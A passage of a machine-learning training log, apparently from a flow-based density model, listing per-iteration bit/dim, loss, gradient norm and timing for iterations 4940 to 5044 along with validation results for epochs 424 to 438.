1.0836(1.0788) | Xent 0.0000(0.0000) | Loss 1.0836(1.0788) | Error 0.0000(0.0000) Steps 440(441.22) | Grad Norm 0.0929(0.1493) | Total Time 10.00(10.00)\nIter 4941 | Time 40.3243(40.2084) | Bit/dim 1.0752(1.0787) | Xent 0.0000(0.0000) | Loss 1.0752(1.0787) | Error 0.0000(0.0000) Steps 440(441.18) | Grad Norm 0.0734(0.1470) | Total Time 10.00(10.00)\nIter 4942 | Time 41.0155(40.2326) | Bit/dim 1.0800(1.0787) | Xent 0.0000(0.0000) | Loss 1.0800(1.0787) | Error 0.0000(0.0000) Steps 446(441.33) | Grad Norm 0.0711(0.1447) | Total Time 10.00(10.00)\nIter 4943 | Time 43.1043(40.3188) | Bit/dim 1.0751(1.0786) | Xent 0.0000(0.0000) | Loss 1.0751(1.0786) | Error 0.0000(0.0000) Steps 440(441.29) | Grad Norm 0.0728(0.1426) | Total Time 10.00(10.00)\nIter 4944 | Time 39.0480(40.2807) | Bit/dim 1.0751(1.0785) | Xent 0.0000(0.0000) | Loss 1.0751(1.0785) | Error 0.0000(0.0000) Steps 440(441.25) | Grad Norm 0.0781(0.1406) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0424 | Time 14.8117, Epoch Time 310.5949(310.2607), Bit/dim 1.0723(best: 1.0723), Xent 0.0000, Loss 1.0723, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4945 | Time 40.4627(40.2861) | Bit/dim 1.0774(1.0785) | Xent 0.0000(0.0000) | Loss 1.0774(1.0785) | Error 0.0000(0.0000) Steps 440(441.21) | Grad Norm 0.0774(0.1387) | Total Time 10.00(10.00)\nIter 4946 | Time 40.8645(40.3035) | Bit/dim 1.0746(1.0783) | Xent 0.0000(0.0000) | Loss 1.0746(1.0783) | Error 0.0000(0.0000) Steps 440(441.18) | Grad Norm 0.0699(0.1367) | Total Time 10.00(10.00)\nIter 4947 | Time 39.2431(40.2717) | Bit/dim 1.0836(1.0785) | Xent 0.0000(0.0000) | Loss 1.0836(1.0785) | Error 0.0000(0.0000) Steps 440(441.14) | Grad Norm 0.0669(0.1346) | Total Time 10.00(10.00)\nIter 4948 | Time 41.5398(40.3097) | Bit/dim 1.0777(1.0785) | Xent 0.0000(0.0000) | Loss 1.0777(1.0785) | Error 0.0000(0.0000) Steps 440(441.11) | Grad Norm 0.0712(0.1327) | Total Time 10.00(10.00)\nIter 4949 | Time 38.9899(40.2701) | Bit/dim 1.0758(1.0784) | Xent 0.0000(0.0000) | Loss 1.0758(1.0784) | Error 0.0000(0.0000) Steps 440(441.07) | Grad Norm 0.0655(0.1307) | Total Time 10.00(10.00)\nIter 4950 | Time 40.2504(40.2695) | Bit/dim 1.0767(1.0783) | Xent 0.0000(0.0000) | Loss 1.0767(1.0783) | Error 0.0000(0.0000) Steps 440(441.04) | Grad Norm 0.0666(0.1287) | Total Time 10.00(10.00)\nIter 4951 | Time 40.3574(40.2722) | Bit/dim 1.0796(1.0784) | Xent 0.0000(0.0000) | Loss 1.0796(1.0784) | Error 0.0000(0.0000) Steps 446(441.19) | Grad Norm 0.0766(0.1272) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0425 | Time 14.9444, Epoch Time 309.1777(310.2282), Bit/dim 1.0730(best: 1.0723), Xent 0.0000, Loss 1.0730, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4952 | Time 39.9583(40.2627) | Bit/dim 1.0780(1.0784) | Xent 0.0000(0.0000) | Loss 1.0780(1.0784) | Error 0.0000(0.0000) Steps 440(441.15) | Grad Norm 0.0721(0.1255) | Total Time 10.00(10.00)\nIter 4953 | Time 41.8324(40.3098) | Bit/dim 1.0762(1.0783) | Xent 0.0000(0.0000) | Loss 1.0762(1.0783) | Error 0.0000(0.0000) Steps 440(441.12) | Grad Norm 0.0959(0.1246) | Total Time 10.00(10.00)\nIter 4954 | Time 40.0197(40.3011) | Bit/dim 1.0792(1.0783) | Xent 0.0000(0.0000) | Loss 1.0792(1.0783) | Error 0.0000(0.0000) Steps 446(441.27) | Grad Norm 0.0640(0.1228) | Total Time 10.00(10.00)\nIter 4955 | Time 39.0527(40.2637) | Bit/dim 1.0818(1.0784) | Xent 0.0000(0.0000) | Loss 1.0818(1.0784) | Error 0.0000(0.0000) Steps 446(441.41) | Grad Norm 0.0801(0.1215) | Total Time 10.00(10.00)\nIter 4956 | Time 40.8812(40.2822) | Bit/dim 1.0780(1.0784) | Xent 0.0000(0.0000) | Loss 1.0780(1.0784) | Error 0.0000(0.0000) Steps 446(441.55) | Grad Norm 0.0716(0.1200) | Total Time 10.00(10.00)\nIter 4957 | Time 39.9406(40.2719) | Bit/dim 1.0737(1.0783) | Xent 0.0000(0.0000) | Loss 1.0737(1.0783) | Error 0.0000(0.0000) Steps 440(441.50) | Grad Norm 0.0642(0.1184) | Total Time 10.00(10.00)\nIter 4958 | Time 40.6697(40.2839) | Bit/dim 1.0753(1.0782) | Xent 0.0000(0.0000) | Loss 1.0753(1.0782) | Error 0.0000(0.0000) Steps 440(441.45) | Grad Norm 0.0679(0.1169) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0426 | Time 14.9085, Epoch Time 310.1806(310.2268), Bit/dim 1.0725(best: 1.0723), Xent 0.0000, Loss 1.0725, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4959 | Time 40.0364(40.2765) | Bit/dim 1.0824(1.0783) | Xent 0.0000(0.0000) | Loss 1.0824(1.0783) | Error 0.0000(0.0000) Steps 440(441.41) | Grad Norm 0.0640(0.1153) | Total Time 10.00(10.00)\nIter 4960 | Time 39.0795(40.2405) | Bit/dim 1.0789(1.0783) | Xent 0.0000(0.0000) | Loss 1.0789(1.0783) | Error 0.0000(0.0000) Steps 440(441.37) | Grad Norm 0.0829(0.1143) | Total Time 10.00(10.00)\nIter 4961 | Time 40.7694(40.2564) | Bit/dim 1.0770(1.0783) | Xent 0.0000(0.0000) | Loss 1.0770(1.0783) | Error 0.0000(0.0000) Steps 446(441.51) | Grad Norm 0.0735(0.1131) | Total Time 10.00(10.00)\nIter 4962 | Time 40.5780(40.2661) | Bit/dim 1.0795(1.0783) | Xent 0.0000(0.0000) | Loss 1.0795(1.0783) | Error 0.0000(0.0000) Steps 440(441.46) | Grad Norm 0.0602(0.1115) | Total Time 10.00(10.00)\nIter 4963 | Time 40.9545(40.2867) | Bit/dim 1.0762(1.0783) | Xent 0.0000(0.0000) | Loss 1.0762(1.0783) | Error 0.0000(0.0000) Steps 446(441.60) | Grad Norm 0.0599(0.1099) | Total Time 10.00(10.00)\nIter 4964 | Time 42.1199(40.3417) | Bit/dim 1.0735(1.0781) | Xent 0.0000(0.0000) | Loss 1.0735(1.0781) | Error 0.0000(0.0000) Steps 458(442.09) | Grad Norm 0.0711(0.1088) | Total Time 10.00(10.00)\nIter 4965 | Time 41.8677(40.3875) | Bit/dim 1.0804(1.0782) | Xent 0.0000(0.0000) | Loss 1.0804(1.0782) | Error 0.0000(0.0000) Steps 440(442.03) | Grad Norm 0.0752(0.1078) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0427 | Time 14.8628, Epoch Time 312.6497(310.2995), Bit/dim 1.0725(best: 1.0723), Xent 0.0000, Loss 1.0725, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4966 | Time 40.4078(40.3881) | Bit/dim 1.0808(1.0783) | Xent 0.0000(0.0000) | Loss 1.0808(1.0783) | Error 0.0000(0.0000) Steps 440(441.97) | Grad Norm 0.1149(0.1080) | Total Time 10.00(10.00)\nIter 4967 | Time 41.4231(40.4192) | Bit/dim 1.0743(1.0782) | Xent 0.0000(0.0000) | Loss 1.0743(1.0782) | Error 0.0000(0.0000) Steps 446(442.09) | Grad Norm 0.0646(0.1067) | Total Time 10.00(10.00)\nIter 4968 | Time 40.0073(40.4068) | Bit/dim 1.0797(1.0782) | Xent 0.0000(0.0000) | Loss 1.0797(1.0782) | Error 0.0000(0.0000) Steps 440(442.03) | Grad Norm 0.0681(0.1055) | Total Time 10.00(10.00)\nIter 4969 | Time 38.9913(40.3643) | Bit/dim 1.0825(1.0783) | Xent 0.0000(0.0000) | Loss 1.0825(1.0783) | Error 0.0000(0.0000) Steps 440(441.96) | Grad Norm 0.0666(0.1044) | Total Time 10.00(10.00)\nIter 4970 | Time 40.8511(40.3789) | Bit/dim 1.0753(1.0782) | Xent 0.0000(0.0000) | Loss 1.0753(1.0782) | Error 0.0000(0.0000) Steps 440(441.91) | Grad Norm 0.0866(0.1038) | Total Time 10.00(10.00)\nIter 4971 | Time 41.7762(40.4209) | Bit/dim 1.0785(1.0783) | Xent 0.0000(0.0000) | Loss 1.0785(1.0783) | Error 0.0000(0.0000) Steps 446(442.03) | Grad Norm 0.0929(0.1035) | Total Time 10.00(10.00)\nIter 4972 | Time 38.8768(40.3745) | Bit/dim 1.0728(1.0781) | Xent 0.0000(0.0000) | Loss 1.0728(1.0781) | Error 0.0000(0.0000) Steps 440(441.97) | Grad Norm 0.0807(0.1028) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0428 | Time 14.7070, Epoch Time 309.7595(310.2833), Bit/dim 1.0719(best: 1.0723), Xent 0.0000, Loss 1.0719, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4973 | Time 39.4723(40.3475) | Bit/dim 1.0800(1.0781) | Xent 0.0000(0.0000) | Loss 1.0800(1.0781) | Error 0.0000(0.0000) Steps 440(441.91) | Grad Norm 0.0584(0.1015) | Total Time 10.00(10.00)\nIter 4974 | Time 41.3246(40.3768) | Bit/dim 1.0735(1.0780) | Xent 0.0000(0.0000) | Loss 1.0735(1.0780) | Error 0.0000(0.0000) Steps 446(442.03) | Grad Norm 0.0625(0.1003) | Total Time 10.00(10.00)\nIter 4975 | Time 40.3655(40.3764) | Bit/dim 1.0770(1.0780) | Xent 0.0000(0.0000) | Loss 1.0770(1.0780) | Error 0.0000(0.0000) Steps 440(441.97) | Grad Norm 0.0585(0.0991) | Total Time 10.00(10.00)\nIter 4976 | Time 42.3587(40.4359) | Bit/dim 1.0743(1.0779) | Xent 0.0000(0.0000) | Loss 1.0743(1.0779) | Error 0.0000(0.0000) Steps 440(441.91) | Grad Norm 0.0711(0.0982) | Total Time 10.00(10.00)\nIter 4977 | Time 39.8828(40.4193) | Bit/dim 1.0793(1.0779) | Xent 0.0000(0.0000) | Loss 1.0793(1.0779) | Error 0.0000(0.0000) Steps 440(441.85) | Grad Norm 0.1055(0.0984) | Total Time 10.00(10.00)\nIter 4978 | Time 39.4826(40.3912) | Bit/dim 1.0755(1.0778) | Xent 0.0000(0.0000) | Loss 1.0755(1.0778) | Error 0.0000(0.0000) Steps 446(441.98) | Grad Norm 0.0772(0.0978) | Total Time 10.00(10.00)\nIter 4979 | Time 39.6998(40.3705) | Bit/dim 1.0811(1.0779) | Xent 0.0000(0.0000) | Loss 1.0811(1.0779) | Error 0.0000(0.0000) Steps 446(442.10) | Grad Norm 0.0827(0.0973) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0429 | Time 14.8437, Epoch Time 309.7676(310.2678), Bit/dim 1.0725(best: 1.0719), Xent 0.0000, Loss 1.0725, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4980 | Time 40.6855(40.3799) | Bit/dim 1.0769(1.0779) | Xent 0.0000(0.0000) | Loss 1.0769(1.0779) | Error 0.0000(0.0000) Steps 446(442.22) | Grad Norm 0.0850(0.0970) | Total Time 10.00(10.00)\nIter 4981 | Time 38.8004(40.3325) | Bit/dim 1.0765(1.0779) | Xent 0.0000(0.0000) | Loss 1.0765(1.0779) | Error 0.0000(0.0000) Steps 440(442.15) | Grad Norm 0.0593(0.0958) | Total Time 10.00(10.00)\nIter 4982 | Time 40.5873(40.3402) | Bit/dim 1.0741(1.0777) | Xent 0.0000(0.0000) | Loss 1.0741(1.0777) | Error 0.0000(0.0000) Steps 440(442.08) | Grad Norm 0.0974(0.0959) | Total Time 10.00(10.00)\nIter 4983 | Time 40.9950(40.3598) | Bit/dim 1.0771(1.0777) | Xent 0.0000(0.0000) | Loss 1.0771(1.0777) | Error 0.0000(0.0000) Steps 440(442.02) | Grad Norm 0.1244(0.0967) | Total Time 10.00(10.00)\nIter 4984 | Time 38.7774(40.3124) | Bit/dim 1.0790(1.0778) | Xent 0.0000(0.0000) | Loss 1.0790(1.0778) | Error 0.0000(0.0000) Steps 446(442.14) | Grad Norm 0.0833(0.0963) | Total Time 10.00(10.00)\nIter 4985 | Time 39.4403(40.2862) | Bit/dim 1.0783(1.0778) | Xent 0.0000(0.0000) | Loss 1.0783(1.0778) | Error 0.0000(0.0000) Steps 440(442.08) | Grad Norm 0.0613(0.0953) | Total Time 10.00(10.00)\nIter 4986 | Time 40.6629(40.2975) | Bit/dim 1.0791(1.0778) | Xent 0.0000(0.0000) | Loss 1.0791(1.0778) | Error 0.0000(0.0000) Steps 446(442.20) | Grad Norm 0.0635(0.0943) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0430 | Time 14.9879, Epoch Time 307.4597(310.1835), Bit/dim 1.0722(best: 1.0719), Xent 0.0000, Loss 1.0722, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4987 | Time 41.6087(40.3368) | Bit/dim 1.0753(1.0778) | Xent 0.0000(0.0000) | Loss 1.0753(1.0778) | Error 0.0000(0.0000) Steps 440(442.13) | Grad Norm 0.0649(0.0935) | Total Time 10.00(10.00)\nIter 4988 | Time 39.6567(40.3164) | Bit/dim 1.0746(1.0777) | Xent 0.0000(0.0000) | Loss 1.0746(1.0777) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.1081(0.0939) | Total Time 10.00(10.00)\nIter 4989 | Time 39.8385(40.3021) | Bit/dim 1.0794(1.0777) | Xent 0.0000(0.0000) | Loss 1.0794(1.0777) | Error 0.0000(0.0000) Steps 446(442.18) | Grad Norm 0.0821(0.0935) | Total Time 10.00(10.00)\nIter 4990 | Time 40.8454(40.3184) | Bit/dim 1.0732(1.0776) | Xent 0.0000(0.0000) | Loss 1.0732(1.0776) | Error 0.0000(0.0000) Steps 446(442.30) | Grad Norm 0.0715(0.0929) | Total Time 10.00(10.00)\nIter 4991 | Time 41.0742(40.3411) | Bit/dim 1.0788(1.0776) | Xent 0.0000(0.0000) | Loss 1.0788(1.0776) | Error 0.0000(0.0000) Steps 440(442.23) | Grad Norm 0.0970(0.0930) | Total Time 10.00(10.00)\nIter 4992 | Time 40.1930(40.3366) | Bit/dim 1.0808(1.0777) | Xent 0.0000(0.0000) | Loss 1.0808(1.0777) | Error 0.0000(0.0000) Steps 458(442.70) | Grad Norm 0.0593(0.0920) | Total Time 10.00(10.00)\nIter 4993 | Time 41.4818(40.3710) | Bit/dim 1.0773(1.0777) | Xent 0.0000(0.0000) | Loss 1.0773(1.0777) | Error 0.0000(0.0000) Steps 446(442.80) | Grad Norm 0.0650(0.0912) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0431 | Time 15.0206, Epoch Time 312.2339(310.2451), Bit/dim 1.0725(best: 1.0719), Xent 0.0000, Loss 1.0725, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4994 | Time 41.3809(40.4013) | Bit/dim 1.0759(1.0776) | Xent 0.0000(0.0000) | Loss 1.0759(1.0776) | Error 0.0000(0.0000) Steps 446(442.90) | Grad Norm 0.0669(0.0905) | Total Time 10.00(10.00)\nIter 4995 | Time 40.5334(40.4052) | Bit/dim 1.0804(1.0777) | Xent 0.0000(0.0000) | Loss 1.0804(1.0777) | Error 0.0000(0.0000) Steps 446(442.99) | Grad Norm 0.0598(0.0895) | Total Time 10.00(10.00)\nIter 4996 | Time 40.7817(40.4165) | Bit/dim 1.0807(1.0778) | Xent 0.0000(0.0000) | Loss 1.0807(1.0778) | Error 0.0000(0.0000) Steps 446(443.08) | Grad Norm 0.0699(0.0889) | Total Time 10.00(10.00)\nIter 4997 | Time 40.8604(40.4298) | Bit/dim 1.0776(1.0778) | Xent 0.0000(0.0000) | Loss 1.0776(1.0778) | Error 0.0000(0.0000) Steps 440(442.99) | Grad Norm 0.0885(0.0889) | Total Time 10.00(10.00)\nIter 4998 | Time 40.6647(40.4369) | Bit/dim 1.0755(1.0777) | Xent 0.0000(0.0000) | Loss 1.0755(1.0777) | Error 0.0000(0.0000) Steps 440(442.90) | Grad Norm 0.0914(0.0890) | Total Time 10.00(10.00)\nIter 4999 | Time 40.2814(40.4322) | Bit/dim 1.0769(1.0777) | Xent 0.0000(0.0000) | Loss 1.0769(1.0777) | Error 0.0000(0.0000) Steps 440(442.81) | Grad Norm 0.0641(0.0883) | Total Time 10.00(10.00)\nIter 5000 | Time 42.0648(40.4812) | Bit/dim 1.0772(1.0777) | Xent 0.0000(0.0000) | Loss 1.0772(1.0777) | Error 0.0000(0.0000) Steps 440(442.73) | Grad Norm 0.0602(0.0874) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0432 | Time 14.8220, Epoch Time 313.7954(310.3516), Bit/dim 1.0722(best: 1.0719), Xent 0.0000, Loss 1.0722, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5001 | Time 41.4722(40.5109) | Bit/dim 1.0750(1.0776) | Xent 0.0000(0.0000) | Loss 1.0750(1.0776) | Error 0.0000(0.0000) Steps 440(442.65) | Grad Norm 0.0613(0.0866) | Total Time 10.00(10.00)\nIter 5002 | Time 40.4362(40.5087) | Bit/dim 1.0755(1.0776) | Xent 0.0000(0.0000) | Loss 1.0755(1.0776) | Error 0.0000(0.0000) Steps 446(442.75) | Grad Norm 0.0626(0.0859) | Total Time 10.00(10.00)\nIter 5003 | Time 40.6158(40.5119) | Bit/dim 1.0774(1.0775) | Xent 0.0000(0.0000) | Loss 1.0774(1.0775) | Error 0.0000(0.0000) Steps 440(442.66) | Grad Norm 0.0832(0.0858) | Total Time 10.00(10.00)\nIter 5004 | Time 41.7027(40.5476) | Bit/dim 1.0790(1.0776) | Xent 0.0000(0.0000) | Loss 1.0790(1.0776) | Error 0.0000(0.0000) Steps 440(442.58) | Grad Norm 0.1089(0.0865) | Total Time 10.00(10.00)\nIter 5005 | Time 40.7651(40.5542) | Bit/dim 1.0790(1.0776) | Xent 0.0000(0.0000) | Loss 1.0790(1.0776) | Error 0.0000(0.0000) Steps 440(442.51) | Grad Norm 0.0684(0.0860) | Total Time 10.00(10.00)\nIter 5006 | Time 39.5837(40.5250) | Bit/dim 1.0784(1.0777) | Xent 0.0000(0.0000) | Loss 1.0784(1.0777) | Error 0.0000(0.0000) Steps 440(442.43) | Grad Norm 0.0785(0.0858) | Total Time 10.00(10.00)\nIter 5007 | Time 40.3984(40.5212) | Bit/dim 1.0766(1.0776) | Xent 0.0000(0.0000) | Loss 1.0766(1.0776) | Error 0.0000(0.0000) Steps 446(442.54) | Grad Norm 0.0690(0.0853) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0433 | Time 14.8332, Epoch Time 312.2502(310.4085), Bit/dim 1.0724(best: 1.0719), Xent 0.0000, Loss 1.0724, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5008 | Time 40.5081(40.5208) | Bit/dim 1.0811(1.0777) | Xent 0.0000(0.0000) | Loss 1.0811(1.0777) | Error 0.0000(0.0000) Steps 440(442.46) | Grad Norm 0.1218(0.0864) | Total Time 10.00(10.00)\nIter 5009 | Time 40.0130(40.5056) | Bit/dim 1.0746(1.0776) | Xent 0.0000(0.0000) | Loss 1.0746(1.0776) | Error 0.0000(0.0000) Steps 440(442.39) | Grad Norm 0.0718(0.0859) | Total Time 10.00(10.00)\nIter 5010 | Time 40.7884(40.5141) | Bit/dim 1.0797(1.0777) | Xent 0.0000(0.0000) | Loss 1.0797(1.0777) | Error 0.0000(0.0000) Steps 440(442.32) | Grad Norm 0.0960(0.0862) | Total Time 10.00(10.00)\nIter 5011 | Time 39.5466(40.4851) | Bit/dim 1.0732(1.0776) | Xent 0.0000(0.0000) | Loss 1.0732(1.0776) | Error 0.0000(0.0000) Steps 440(442.25) | Grad Norm 0.0857(0.0862) | Total Time 10.00(10.00)\nIter 5012 | Time 39.2753(40.4488) | Bit/dim 1.0755(1.0775) | Xent 0.0000(0.0000) | Loss 1.0755(1.0775) | Error 0.0000(0.0000) Steps 440(442.18) | Grad Norm 0.0813(0.0861) | Total Time 10.00(10.00)\nIter 5013 | Time 39.5265(40.4211) | Bit/dim 1.0790(1.0775) | Xent 0.0000(0.0000) | Loss 1.0790(1.0775) | Error 0.0000(0.0000) Steps 440(442.11) | Grad Norm 0.1171(0.0870) | Total Time 10.00(10.00)\nIter 5014 | Time 40.1235(40.4122) | Bit/dim 1.0799(1.0776) | Xent 0.0000(0.0000) | Loss 1.0799(1.0776) | Error 0.0000(0.0000) Steps 446(442.23) | Grad Norm 0.1433(0.0887) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0434 | Time 14.9270, Epoch Time 307.1863(310.3119), Bit/dim 1.0720(best: 1.0719), Xent 0.0000, Loss 1.0720, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5015 | Time 40.8467(40.4252) | Bit/dim 1.0775(1.0776) | Xent 0.0000(0.0000) | Loss 1.0775(1.0776) | Error 0.0000(0.0000) Steps 446(442.34) | Grad Norm 0.0859(0.0886) | Total Time 10.00(10.00)\nIter 5016 | Time 39.4184(40.3950) | Bit/dim 1.0839(1.0778) | Xent 0.0000(0.0000) | Loss 1.0839(1.0778) | Error 0.0000(0.0000) Steps 440(442.27) | Grad Norm 0.0686(0.0880) | Total Time 10.00(10.00)\nIter 5017 | Time 39.3088(40.3624) | Bit/dim 1.0708(1.0776) | Xent 0.0000(0.0000) | Loss 1.0708(1.0776) | Error 0.0000(0.0000) Steps 446(442.39) | Grad Norm 0.0977(0.0883) | Total Time 10.00(10.00)\nIter 5018 | Time 41.1002(40.3846) | Bit/dim 1.0767(1.0776) | Xent 0.0000(0.0000) | Loss 1.0767(1.0776) | Error 0.0000(0.0000) Steps 440(442.31) | Grad Norm 0.1073(0.0889) | Total Time 10.00(10.00)\nIter 5019 | Time 40.7159(40.3945) | Bit/dim 1.0763(1.0775) | Xent 0.0000(0.0000) | Loss 1.0763(1.0775) | Error 0.0000(0.0000) Steps 446(442.42) | Grad Norm 0.0898(0.0889) | Total Time 10.00(10.00)\nIter 5020 | Time 40.4970(40.3976) | Bit/dim 1.0803(1.0776) | Xent 0.0000(0.0000) | Loss 1.0803(1.0776) | Error 0.0000(0.0000) Steps 440(442.35) | Grad Norm 0.0717(0.0884) | Total Time 10.00(10.00)\nIter 5021 | Time 40.6345(40.4047) | Bit/dim 1.0766(1.0776) | Xent 0.0000(0.0000) | Loss 1.0766(1.0776) | Error 0.0000(0.0000) Steps 446(442.46) | Grad Norm 0.0879(0.0884) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0435 | Time 14.9477, Epoch Time 310.4444(310.3158), Bit/dim 1.0723(best: 1.0719), Xent 0.0000, Loss 1.0723, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5022 | Time 40.1845(40.3981) | Bit/dim 1.0782(1.0776) | Xent 0.0000(0.0000) | Loss 1.0782(1.0776) | Error 0.0000(0.0000) Steps 440(442.39) | Grad Norm 0.0558(0.0874) | Total Time 10.00(10.00)\nIter 5023 | Time 40.9060(40.4133) | Bit/dim 1.0798(1.0777) | Xent 0.0000(0.0000) | Loss 1.0798(1.0777) | Error 0.0000(0.0000) Steps 440(442.32) | Grad Norm 0.1517(0.0893) | Total Time 10.00(10.00)\nIter 5024 | Time 39.3858(40.3825) | Bit/dim 1.0782(1.0777) | Xent 0.0000(0.0000) | Loss 1.0782(1.0777) | Error 0.0000(0.0000) Steps 440(442.25) | Grad Norm 0.0979(0.0896) | Total Time 10.00(10.00)\nIter 5025 | Time 41.2389(40.4082) | Bit/dim 1.0768(1.0777) | Xent 0.0000(0.0000) | Loss 1.0768(1.0777) | Error 0.0000(0.0000) Steps 446(442.36) | Grad Norm 0.0659(0.0889) | Total Time 10.00(10.00)\nIter 5026 | Time 40.4883(40.4106) | Bit/dim 1.0750(1.0776) | Xent 0.0000(0.0000) | Loss 1.0750(1.0776) | Error 0.0000(0.0000) Steps 440(442.29) | Grad Norm 0.1112(0.0895) | Total Time 10.00(10.00)\nIter 5027 | Time 39.8216(40.3929) | Bit/dim 1.0736(1.0775) | Xent 0.0000(0.0000) | Loss 1.0736(1.0775) | Error 0.0000(0.0000) Steps 446(442.40) | Grad Norm 0.0962(0.0897) | Total Time 10.00(10.00)\nIter 5028 | Time 39.4586(40.3649) | Bit/dim 1.0760(1.0774) | Xent 0.0000(0.0000) | Loss 1.0760(1.0774) | Error 0.0000(0.0000) Steps 446(442.51) | Grad Norm 0.0656(0.0890) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0436 | Time 14.7090, Epoch Time 308.5731(310.2635), Bit/dim 1.0721(best: 1.0719), Xent 0.0000, Loss 1.0721, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5029 | Time 41.3333(40.3939) | Bit/dim 1.0790(1.0775) | Xent 0.0000(0.0000) | Loss 1.0790(1.0775) | Error 0.0000(0.0000) Steps 440(442.43) | Grad Norm 0.0580(0.0881) | Total Time 10.00(10.00)\nIter 5030 | Time 41.4473(40.4255) | Bit/dim 1.0783(1.0775) | Xent 0.0000(0.0000) | Loss 1.0783(1.0775) | Error 0.0000(0.0000) Steps 440(442.36) | Grad Norm 0.0617(0.0873) | Total Time 10.00(10.00)\nIter 5031 | Time 38.7924(40.3765) | Bit/dim 1.0737(1.0774) | Xent 0.0000(0.0000) | Loss 1.0737(1.0774) | Error 0.0000(0.0000) Steps 440(442.29) | Grad Norm 0.0757(0.0869) | Total Time 10.00(10.00)\nIter 5032 | Time 40.5579(40.3820) | Bit/dim 1.0764(1.0773) | Xent 0.0000(0.0000) | Loss 1.0764(1.0773) | Error 0.0000(0.0000) Steps 440(442.22) | Grad Norm 0.0761(0.0866) | Total Time 10.00(10.00)\nIter 5033 | Time 39.3008(40.3496) | Bit/dim 1.0759(1.0773) | Xent 0.0000(0.0000) | Loss 1.0759(1.0773) | Error 0.0000(0.0000) Steps 440(442.15) | Grad Norm 0.0675(0.0860) | Total Time 10.00(10.00)\nIter 5034 | Time 41.3475(40.3795) | Bit/dim 1.0801(1.0774) | Xent 0.0000(0.0000) | Loss 1.0801(1.0774) | Error 0.0000(0.0000) Steps 446(442.27) | Grad Norm 0.0746(0.0857) | Total Time 10.00(10.00)\nIter 5035 | Time 39.9309(40.3660) | Bit/dim 1.0763(1.0773) | Xent 0.0000(0.0000) | Loss 1.0763(1.0773) | Error 0.0000(0.0000) Steps 440(442.20) | Grad Norm 0.0594(0.0849) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0437 | Time 14.7019, Epoch Time 310.0603(310.2575), Bit/dim 1.0723(best: 1.0719), Xent 0.0000, Loss 1.0723, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5036 | Time 40.9551(40.3837) | Bit/dim 1.0833(1.0775) | Xent 0.0000(0.0000) | Loss 1.0833(1.0775) | Error 0.0000(0.0000) Steps 440(442.13) | Grad Norm 0.0621(0.0842) | Total Time 10.00(10.00)\nIter 5037 | Time 41.0368(40.4033) | Bit/dim 1.0772(1.0775) | Xent 0.0000(0.0000) | Loss 1.0772(1.0775) | Error 0.0000(0.0000) Steps 446(442.25) | Grad Norm 0.0839(0.0842) | Total Time 10.00(10.00)\nIter 5038 | Time 40.9004(40.4182) | Bit/dim 1.0727(1.0774) | Xent 0.0000(0.0000) | Loss 1.0727(1.0774) | Error 0.0000(0.0000) Steps 440(442.18) | Grad Norm 0.0826(0.0842) | Total Time 10.00(10.00)\nIter 5039 | Time 39.0902(40.3784) | Bit/dim 1.0771(1.0774) | Xent 0.0000(0.0000) | Loss 1.0771(1.0774) | Error 0.0000(0.0000) Steps 440(442.12) | Grad Norm 0.0623(0.0835) | Total Time 10.00(10.00)\nIter 5040 | Time 39.2548(40.3447) | Bit/dim 1.0756(1.0773) | Xent 0.0000(0.0000) | Loss 1.0756(1.0773) | Error 0.0000(0.0000) Steps 440(442.05) | Grad Norm 0.0578(0.0827) | Total Time 10.00(10.00)\nIter 5041 | Time 41.1643(40.3693) | Bit/dim 1.0755(1.0773) | Xent 0.0000(0.0000) | Loss 1.0755(1.0773) | Error 0.0000(0.0000) Steps 440(441.99) | Grad Norm 0.0680(0.0823) | Total Time 10.00(10.00)\nIter 5042 | Time 39.3258(40.3380) | Bit/dim 1.0786(1.0773) | Xent 0.0000(0.0000) | Loss 1.0786(1.0773) | Error 0.0000(0.0000) Steps 440(441.93) | Grad Norm 0.1136(0.0832) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0438 | Time 14.7963, Epoch Time 308.9398(310.2179), Bit/dim 1.0721(best: 1.0719), Xent 0.0000, Loss 1.0721, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5043 | Time 40.4211(40.3404) | Bit/dim 1.0788(1.0773) | Xent 0.0000(0.0000) | Loss 1.0788(1.0773) | Error 0.0000(0.0000) Steps 446(442.05) | Grad Norm 0.0645(0.0827) | Total Time 10.00(10.00)\nIter 5044 | Time 39.5492(40.3167) | Bit/dim 1.0730(1.0772) | Xent 0.0000(0.0000) | Loss 1.0730(1.0772) | Error 0.0000(0.0000) Steps 440(441.99) | Grad Norm 0.0595(0.0820) | Total Time 